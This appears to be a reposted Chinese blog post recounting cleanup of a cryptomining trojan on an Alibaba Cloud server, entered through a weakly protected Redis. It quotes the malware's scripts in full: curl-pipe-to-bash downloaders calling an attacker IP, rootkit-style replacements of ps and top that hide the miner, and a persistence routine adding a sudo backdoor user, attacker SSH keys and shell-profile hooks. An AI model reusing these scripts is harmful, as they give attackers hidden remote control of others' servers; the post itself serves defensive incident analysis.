高高兴兴来实验室学习,结果
top和ps查看进程,无异常(原因是top指令被纂改)
查看定时任务
crontab -l lanigiro 发现一个定时任务,我从来没设置过定时任务![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EvrNJxWn-1646213868845)(面对木马,输的很彻底/img/1646212762807.png)]](https://www.moluyao.wang/wp-content/uploads/2023/05/unnamed-file-2876.png "阿里云云服务器被恶意纂改挖矿插图2"){kind=small}
修改定时任务
crontab -e 修改失败
删除该定时任务
crontab -r 删除失败
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ylG1Y1Hh-1646213868846)(面对木马,输的很彻底/img/1646209272600.png)]](https://www.moluyao.wang/wp-content/uploads/2023/05/unnamed-file-2877.png "阿里云云服务器被恶意纂改挖矿插图3"){kind=small}
原因是被锁定了
解锁
chattr -ai /var/spool/cron/root 解锁失败,chattr被病毒删了
下载chattr.c
编译 ,生成a.out
cc chattr.c -bash-4.2# cc chattr.c -bash-4.2# ls a.out backup chattr.c clamav-0.104.2.linux.x86_64.rpm disk.pl Recycle_bin server swap wwwlogs wwwroot -bash-4.2# 改名
mv a.out chattr 运行
./chattr 放回原处
mv chattr /usr/bin/ 停止定时任务
解锁
chattr -ai /var/spool/cron/root ![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5QyHAotI-1646213868847)(面对木马,输的很彻底/img/1646209501828-1646213688509.png)]](https://www.moluyao.wang/wp-content/uploads/2023/05/unnamed-file-2878.png "阿里云云服务器被恶意纂改挖矿插图4")
查看锁
lsattr /var/spool/cron/root ![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cHANSeSy-1646213868848)(面对木马,输的很彻底/img/1646209762261.png)]](https://www.moluyao.wang/wp-content/uploads/2023/05/unnamed-file-2879.png "阿里云云服务器被恶意纂改挖矿插图5")
删除该定时任务
crontab -r 失败
查看 crontab配置
cat /etc/crontab 
被修改啦,暂时不管,停止定时任务服务
service crond stop 查看脚本
这个定时任务的远程地址,下载脚本
#!/bin/bash echo "ok22$(date)" >>/tmp/ok.log export CURL_CMD="curl" if [ -f /bin/cd1 ];then export CURL_CMD="/bin/cd1" elif [ -f /bin/cur ];then export CURL_CMD="/bin/cur" elif [ -f /bin/TNTcurl ];then export CURL_CMD="/bin/TNTcurl" elif [ -f /bin/curltnt ];then export CURL_CMD="/bin/curltnt" elif [ -f /bin/curl1 ];then export CURL_CMD="/bin/curl1" elif [ -f /bin/cdt ];then export CURL_CMD="/bin/cdt" elif [ -f /bin/xcurl ];then export CURL_CMD="/bin/xcurl" elif [ -x "/bin/cdz" ];then export CURL_CMD="/bin/cdz" fi sh_url="http://104.192.82.138/s3f1015" export MOHOME=/var/tmp/.crypto/... if [ -f ${MOHOME}/.ddns.log ];then echo "process possible running" current=$(date +%s) last_modified=$(stat -c "%Y" ${MOHOME}/.ddns.log) if [ $(($current-$last_modified)) -gt 6 ];then echo "process is not running" else ${CURL_CMD} -fsSL -o ${MOHOME}/.ddns.pid ${sh_url}/m/reg0.tar.gz exit 0 fi fi if [ "$(id -u)" == "0" ];then ${CURL_CMD} -fsSL ${sh_url}/c/ar.sh |bash else ${CURL_CMD} -fsSL ${sh_url}/c/ai.sh |bash fi 发现另一个地址http://104.192.82.138/s3f1015,下载脚本,打开
发现ps和top被修改
export PS_CMD="/bin/ps" pssize=$(ls -l /bin/ps | awk '{ print $5 }') ${CHATTR} -i /bin/ps if [ ${pssize} -le 8000 ];then ps_name=$(awk '/$@/ {print $1}' /bin/ps) if [ ! "${ps_name}" = "ps.lanigiro" ];then mv /bin/${ps_name} /bin/ps.lanigiro fi else mv /bin/ps /bin/ps.lanigiro fi echo "#!/bin/bash">/bin/ps echo "ps.lanigiro $@ | grep -v 'ddns|httpd'" >>/bin/ps touch -d 20160825 /bin/ps chmod a+x /bin/ps ${CHATTR} +i /bin/ps if [ -x /bin/ps.lanigiro ];then PS_CMD="/bin/ps.lanigiro" fi topsize=`ls -l /bin/top | awk '{ print $5 }'` ${CHATTR} -i /bin/top if [ ${topsize} -le 8000 ];then top_name=$(awk '/$@/ {print $1}' /bin/top) if [ ! "${top_name}" = "top.lanigiro" ];then mv /bin/${top_name} /bin/top.lanigiro fi else mv /bin/top /bin/top.lanigiro fi echo "#!/bin/bash">/bin/top echo "top.lanigiro $@ | grep -v 'ddns|httpd'">>/bin/top chmod a+x /bin/top touch -d 20160716 /bin/top ${CHATTR} +i /bin/top 使用top被修改后的top.lanigiro,发现挖矿的进程 .ddns
top.lanigiro 
查看进程文件位置,(ps被纂改成ps.lanigiro)
ps.lanigiro -ef | grep 539 ![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y2F7crqp-1646213868850)(面对木马,输的很彻底/img/1646211710714.png)]](https://www.moluyao.wang/wp-content/uploads/2023/05/unnamed-file-2882.png "阿里云云服务器被恶意纂改挖矿插图8")
进入对应文件夹删除全部文件,删不掉的使用
chattr -ai xxxx (忘了截图了)
杀死对应进程
kill 539 查看脚本,似乎添加了很多文件,不知道有啥用,全删了
makesshaxx(){ RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs= root@pending.com" ${CHATTR} -ia /etc/passwd; grep -q lsb /etc/passwd || echo 'lsb:x:1000:1000::/home/lsb:/bin/bash' >> /etc/passwd ${CHATTR} +ia /etc/passwd ${CHATTR} -ia /etc/shadow grep -q "lsb:$6$4E4W/nnk" /etc/shadow || echo 'lsb:$y$j9T$4mqDHpJ8b4riHWm2FfUHY.$./.VlnKhJMI/hj8f8sxbqhIal0jKhPxjyHxB6ZGtUm6:18849:0:99999:7:::' >> /etc/shadow ${CHATTR} +ia /etc/shadow ${CHATTR} -ia /etc/sudoers grep -q lsb /etc/sudoers || echo 'lsb ALL=(ALL:ALL) ALL' >> /etc/sudoers ${CHATTR} +i /etc/sudoers mkdir /home/lsb/.ssh/ -p ${CHATTR} -ia /home/lsb/.ssh/authorized_keys touch /home/lsb/.ssh/authorized_keys chmod 600 /home/lsb/.ssh/authorized_keys grep -q root@pending.com /home/lsb/.ssh/authorized_keys || echo $RSAKEY > /home/lsb/.ssh/authorized_keys ${CHATTR} +ia /home/lsb/.ssh/authorized_keys ${CHATTR} -ia /home/lsb/.ssh/authorized_keys2 touch /home/lsb/.ssh/authorized_keys2 chmod 600 /home/lsb/.ssh/authorized_keys2 grep -q root@pending.com /home/lsb/.ssh/authorized_keys2 || echo $RSAKEY > /home/lsb/.ssh/authorized_keys2 ${CHATTR} +ia /home/lsb/.ssh/authorized_keys2 mkdir /root/.ssh/ -p ${CHATTR} -ia /root/.ssh/authorized_keys touch /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys grep -q root@pending.com /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys ${CHATTR} +ia /root/.ssh/authorized_keys ${CHATTR} -ia /root/.ssh/authorized_keys2 touch /root/.ssh/authorized_keys2 chmod 600 /root/.ssh/authorized_keys2 grep -q root@pending.com /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2 ${CHATTR} +ia /root/.ssh/authorized_keys2 for f in $(ls /home) do if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.profile > /dev/null;then echo "{" >> /home/${f}/.profile echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.profile echo "} > /dev/null 2>&1" >> /home/${f}/.profile fi if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.bashrc > /dev/null;then echo "{" >> /home/${f}/.bashrc echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.bashrc echo "} > /dev/null 2>&1" >> /home/${f}/.bashrc fi done if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.profile > /dev/null;then echo "{" >> /root/.profile echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.profile echo "} > /dev/null 2>&1" >> /root/.profile fi if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.bashrc > /dev/null;then echo "{" >> /root/.bashrc echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.bashrc echo "} > /dev/null 2>&1" >> /root/.bashrc fi } 使用宝塔界面删。。方便找
将命令替换回来
cd /usr/bin chattr -ai ps mv ps.lanigiro ps chattr -ai top mv top.lanigiro top chattr -ai pstree mv pstree.lanigiro pstree 到此为止,不完美解决,crontab定时功能没法用了,对我来说并不是很重要,所以。。。
查阅资料,发现该木马从redis中进来的,只要开启远程访问,密码较弱就有可能被侵入。这次输的很彻底。
原文链接:https://blog.csdn.net/heguu/article/details/123235987?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168466843816800197047861%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=168466843816800197047861&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-10-123235987-null-null.blog_rank_default&utm_term=NAS%E3%80%81%E7%BE%A4%E6%99%96%E3%80%81%E9%98%BF%E9%87%8C%E4%BA%91%E3%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90%E3%80%81%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E3%80%81ipv6%E3%80%81ddns%E3%80%81%E8%BD%BB%E9%87%8F%E7%BA%A7%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E9%93%81%E5%A8%81%E9%A9%AC%E3%80%81%E5%A8%81%E8%81%94%E9%80%9A%E3%80%81DSM%E3%80%81DSM6.0%E3%80%81%E7%BE%A4%E6%99%96nas%E3%80%81%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E8%9C%97%E7%89%9B%E6%98%9F%E9%99%85%E3%80%81%E9%BB%91%E7%BE%A4%E6%99%96%E3%80%81docker%E3%80%81%E5%AE%B9%E5%99%A8%E9%95%9C%E5%83%8F%E3%80%81%E5%9F%9F%E5%90%8D%E6%B3%A8%E5%86%8C%E3%80%81%E5%AE%9D%E5%A1%94%E3%80%81%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E3%80%81nginx%E3%80%81frp%E3%80%81%E5%8A%A8%E6%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90
